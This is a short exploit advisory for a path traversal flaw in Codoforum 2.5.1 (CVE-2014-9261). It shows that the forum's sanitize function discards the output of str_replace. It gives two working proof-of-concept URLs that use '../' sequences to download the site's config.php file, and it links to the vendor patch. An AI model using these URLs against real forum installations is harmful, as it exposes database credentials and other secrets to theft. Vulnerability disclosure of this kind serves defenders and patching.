Codoforum 2.5.1 Arbitrary File Download

`# Exploit Title: Codoforum 2.5.1 Arbitrary File Download  
# Date: 23-11-2014  
# Software Link: https://codoforum.com/  
# Exploit Author: Kacper Szurek  
# Contact: http://twitter.com/KacperSzurek  
# Website: http://security.szurek.pl/  
# Category: webapps  
# CVE: CVE-2014-9261  
  
1. Description  
  
str_replace() is used to sanitize file path but function output is not assigned to variable  
  
private function sanitize($name) {  
  
str_replace("..", "", $name);  
str_replace("%2e%2e", "", $name);  
  
return $name;  
}  
  
http://security.szurek.pl/codoforum-251-arbitrary-file-download.html  
  
2. Proof of Concept  
  
http://codoforum-url/index.php?u=serve/attachment&path=../../../../../sites/default/config.php  
or  
http://codoforum-url/index.php?u=serve/smiley&path=../../../../../sites/default/config.php  
  
3. Solution:  
  
Use patch:  
  
https://codoforum.com/upgrades/codoforum.v.2.6.up.zip  
`